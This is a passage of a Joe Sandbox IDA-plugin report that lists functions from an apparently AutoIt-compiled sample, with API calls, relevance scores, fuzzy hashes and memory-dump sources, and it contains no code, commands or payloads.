Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: d1e8390fff6bc2add41e42e43038c503dc2614f77a6dea9690ed4e1dd2476ed9
Instruction ID: 9b9c0a4fd0b95aff955b2e9bf3dbe0f0ec6794f284094ca6dac2778adc3a95f3
Opcode Fuzzy Hash: d1e8390fff6bc2add41e42e43038c503dc2614f77a6dea9690ed4e1dd2476ed9
Instruction Fuzzy Hash: 79119D729083419BC710EF69E90591ABBF8FF89750F10492EF040872F1DFB89955CB92

Function 00AB092D Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C14,00B652F8,?,?,?), ref: 00AB096E

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_wcscat.LIBCMT ref: 00AE4CB7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 4091aa6de11773c3e9a4709d496f69b4b2345731e8f9316a9e3a955a4dc8c476
Instruction ID: 0fcc22a2dab60433852a3c0513d210ab85bcec4f7fec91915751fea3753f0e58
Opcode Fuzzy Hash: 4091aa6de11773c3e9a4709d496f69b4b2345731e8f9316a9e3a955a4dc8c476
Instruction Fuzzy Hash: D911C871A052099B8B51FBA4CD06EDE73FCEF0C780F0045A6F54AD3282EEB097844B14

Function 00AC0DB6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC571C: __FF_MSGBANNER.LIBCMT ref: 00AC5733
Part of subcall function 00AC571C: __NMSG_WRITE.LIBCMT ref: 00AC573A
Part of subcall function 00AC571C: RtlAllocateHeap.NTDLL(014A0000,00000000,00000001,00000000,?,?,?,00AC0DD3,?), ref: 00AC575F

std::exception::exception.LIBCMT ref: 00AC0DEC
__CxxThrowException@8.LIBCMT ref: 00AC0E01

Part of subcall function 00AC859B: RaiseException.KERNEL32(?,?,?,00B59E78,00000000,?,?,?,?,00AC0E06,?,00B59E78,?,00000001), ref: 00AC85F0

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 9868cd55444b93031f86d24b55e4375059225c2512d41416cb32a38d1ad61974
Instruction ID: 54eda5452b4d4425fef353bfae3c5a5b988b49f18bd04f7bef26868f1a441ee8
Opcode Fuzzy Hash: 9868cd55444b93031f86d24b55e4375059225c2512d41416cb32a38d1ad61974
Instruction Fuzzy Hash: A4F0813290031AA6DB15ABA4EE02FDE77ACAF01311F11446EF908A6291DFB09A8486D1

Function 00AC55FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00AC562C
__lock_file.LIBCMT ref: 00AC564D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: f36c6da6d22b1db018a009c3012ee065249a2ceb7a59a32eb0c7de7d5c5308ec
Instruction ID: deb9a5f8447eb62178547ae79d7054388e29e3cf79c361dc3ee66362364a8bc1
Opcode Fuzzy Hash: f36c6da6d22b1db018a009c3012ee065249a2ceb7a59a32eb0c7de7d5c5308ec
Instruction Fuzzy Hash: 3901B171C00608ABCF12AF788E02E9E7B61BF90321F4A411DF8241A191EB358A91DF91

Function 00AC53A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

__lock_file.LIBCMT ref: 00AC53EB

Part of subcall function 00AC6C11: __lock.LIBCMT ref: 00AC6C34

__fclose_nolock.LIBCMT ref: 00AC53F6

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f54012a79bf3f4e419db836fd3c3163201192300c4dadd52f594aa4358dce218
Instruction ID: 6eb558036afb2549a79c320d3cf24101f926a55f53487b95abeafab919deea76
Opcode Fuzzy Hash: f54012a79bf3f4e419db836fd3c3163201192300c4dadd52f594aa4358dce218
Instruction Fuzzy Hash: 8FF09631D10A449AD711AB759901FAD6AE07F41375F27824CF424AF2C1CFFC99815F51

Function 014E64C0 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

APIs

Part of subcall function 014E5D30: GetFileAttributesW.KERNELBASE(?), ref: 014E5D3B

CreateDirectoryW.KERNELBASE(?,00000000), ref: 014E662E

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: cde6a37d4840fa29f4a65ce7d452e24214bedc96e637eadc48ec2fec4c343785
Instruction ID: c2af955f1e3687c067cc469eba41310de800e17eeddfb13610316222fd75b74e
Opcode Fuzzy Hash: cde6a37d4840fa29f4a65ce7d452e24214bedc96e637eadc48ec2fec4c343785
Instruction Fuzzy Hash: 0461B931A1010997EF14EFB0D854BEF737AEF68300F004569A60DE7290EB799A45CBA5

Function 00AC0C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00AC0CB7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: c52644d7c74332caf2de253b53b27ad07e538ae9136a47cbed73649313cc1e92
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 8C31A070A08105DBCB18DF59C484E69F7B6FB59300B6687A9E84ACB355DA31EDC1DB80

Function 00ADFCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00ADFCB7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 32bf90d519f5a1e6ace7d011f4a0c403c08614621c7136e458d25811b8ee9b7b
Instruction ID: 1b29e024711de5cf6ffae55511e3b0a38b217e5e2663d700006a6801710157e3
Opcode Fuzzy Hash: 32bf90d519f5a1e6ace7d011f4a0c403c08614621c7136e458d25811b8ee9b7b
Instruction Fuzzy Hash: F5410674904341DFDB24DF14C444F1ABBE1BF59318F0988ACE89A8B7A2C772E845CB52

Function 00AA7B53 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7BB3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 41292e0f11f6659f04c39ca27420a656ffec08b7f69e685cf6642529080fbc87
Instruction ID: 1d88bec7144fc86245df1b51359b54571925c56a34b97815260c6ed33cfb011d
Opcode Fuzzy Hash: 41292e0f11f6659f04c39ca27420a656ffec08b7f69e685cf6642529080fbc87
Instruction Fuzzy Hash: E72106B2614B09EBDB14AF16EC41B6E7BB4FB14351F21846EE447CA290EF3091E0D795

Function 00AB08DC Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00AA3C14,00B652F8,?,?,?), ref: 00AB096E

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_wcscat.LIBCMT ref: 00AE4CB7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FullNamePath_memmove_wcscat
String ID:
API String ID: 257928180-0
Opcode ID: 32943e70f63f0af67ae5a1898ce24659eb4a8b8ac6feae6f78bca8712773d65c
Instruction ID: 3711b15e10d68f713b5c0263538698c02ef3c51399bd1c55710fa9d3474a0cae
Opcode Fuzzy Hash: 32943e70f63f0af67ae5a1898ce24659eb4a8b8ac6feae6f78bca8712773d65c
Instruction Fuzzy Hash: 972128319056858FCB12DB78CC969CDBFF4EF0B380B0445D6E885CB283DAB0A58E9B51

Function 00AA4DDD Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00AA4BEF

Part of subcall function 00AC525B: __wfsopen.LIBCMT ref: 00AC5266

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E0F

Part of subcall function 00AA4B6A: FreeLibrary.KERNEL32(00000000), ref: 00AA4BA4

Part of subcall function 00AA4C70: _memmove.LIBCMT ref: 00AA4CBA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: 679cec61e5a6dde2bad95a9c8348566b5be8643dd4eaa7da38ff607c62237de9
Instruction ID: cc8cd12f2b0bb9e712878517d5a39638b4fb0ab09f840e4bd2b7d3a9d338a86a
Opcode Fuzzy Hash: 679cec61e5a6dde2bad95a9c8348566b5be8643dd4eaa7da38ff607c62237de9
Instruction Fuzzy Hash: EF119431600205ABDF25BF70C916FAD77A5AFC9710F108429F542A71C1DBF19911AB61

Function 00ADFD85 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00ADFD91

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9c06a5ff09573e03683658116a7eef3eefcc8abf7ca66dff5f644011a226e0f6
Instruction ID: 725ec10f7f7bebd61eca1e7d84e0d207996284979dfa40f24aa10e14eaed17e7
Opcode Fuzzy Hash: 9c06a5ff09573e03683658116a7eef3eefcc8abf7ca66dff5f644011a226e0f6
Instruction Fuzzy Hash: C52110B4908341DFDB24DF64C444F2ABBE1BF89314F05896CE88A977A2D731E805CB92

Function 00AA7DE1 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00AA7E22

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: f0f00f31bbe49233d18b2a476d5e98e55828f672a7e995be68e81a540d959ad3
Instruction ID: 2f6cda22e57e66a9ad3da31243a0af4c876673ee5ed032ae1b6430c5e049b8f4
Opcode Fuzzy Hash: f0f00f31bbe49233d18b2a476d5e98e55828f672a7e995be68e81a540d959ad3
Instruction Fuzzy Hash: 8A01D672204701AED7319F68CC06FABBBA89B45760F11852EF61ACB1D1EB31E8408790

Function 00AA8248 Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000048,-00000003,?,00AB3E69,?,?,?,-00000003,00000000,00000000), ref: 00AA8280

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: 52cd5c44e6f02b36519dced60028cbdd76879ff18839a3944ade4acc8a1938bc
Instruction ID: b166afcd30a6e6ad9a82179416d5f1b7b2ad831483979c96e4031536f640ea6c
Opcode Fuzzy Hash: 52cd5c44e6f02b36519dced60028cbdd76879ff18839a3944ade4acc8a1938bc
Instruction Fuzzy Hash: CFF0C275600A21DBCB225B54CA00B7AFB65FF46B60F008129F55547690CF39D814CBC4

Function 00AC4863 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00AC48A6

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 2f197f165d07becb5113f4dcd47b6ee1f8bc5e2a0cb81f3587fb8cf0b7be9ca7
Instruction ID: b219ac603a4192b938904b74734f5c510eb9f762397d62641dae8e3718b8bfff
Opcode Fuzzy Hash: 2f197f165d07becb5113f4dcd47b6ee1f8bc5e2a0cb81f3587fb8cf0b7be9ca7
Instruction Fuzzy Hash: FAF0AF31900609EBDF11AFA48D06FAE36A0BF14325F17841CF824AA191CBB88951DB55

Function 00AA4E4A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E7E

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 0f553832b8e496f6c850978e548872d8ebbd2e608f77463db7d7465f14a4347b
Instruction ID: 54a75ed84dc07e0cdb46a2621084897a9a54bdb1ab07991f2f502fa82a0aa37b
Opcode Fuzzy Hash: 0f553832b8e496f6c850978e548872d8ebbd2e608f77463db7d7465f14a4347b
Instruction Fuzzy Hash: 1BF01C71501711CFDB349F64D494852F7F1BF99325310893EF1D683650C7B19840DB40

Function 00AC0791 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC07B0

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 23a14b1ebf917cb9b7180e984a90f4e51a03132b0ce2fc391ad2c7c8435de1b8
Instruction ID: 2bf5d58ceaa35961ddd77e509334965e45abaa5f4ca99850b4f7e1f960cc2136
Opcode Fuzzy Hash: 23a14b1ebf917cb9b7180e984a90f4e51a03132b0ce2fc391ad2c7c8435de1b8
Instruction Fuzzy Hash: 62E08676A0412857C72196989C05FEA77ADDB896A0F0441B6FC09D7244D9609C8086D0

Function 00B08E9F Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00B08EC1

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction ID: a222075fb666862e207317848d872f30044e27690d479b5a2eea887cc46184b3
Opcode Fuzzy Hash: 36e66934677415102e9643fee0822ecf6e22e0db5db5ed1a6e3653ba213ae753
Instruction Fuzzy Hash: 6DE012B1504B045BD7398A24D851BA377E1EB05315F04095DF6EA93241EBA278458759

Function 014E5D30 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 014E5D3B

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 8d9f313df5b38bdc62a90455a86e8321e27c5e86c5b005a87ac5868859067892
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 0EE08634905208DBDB50CAA8C80CEAE73E4D705316F008756E519CB2F0D53299439654

Function 014E5D00 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 014E5D0B

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 16a8804d8e64480d40c869e1ab2f468ec7da7f0a3e104f7c7cc55fe5b7fa90d7
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 10D05E3490520CABDB10DEA8A90C99A73A8D704325F108755E91587280D53299429650

Function 00AC525B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00AC5266

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: d0a7136658dddf5bba4b01b09e3c77a707ce730669b629cc20244ac3668025af
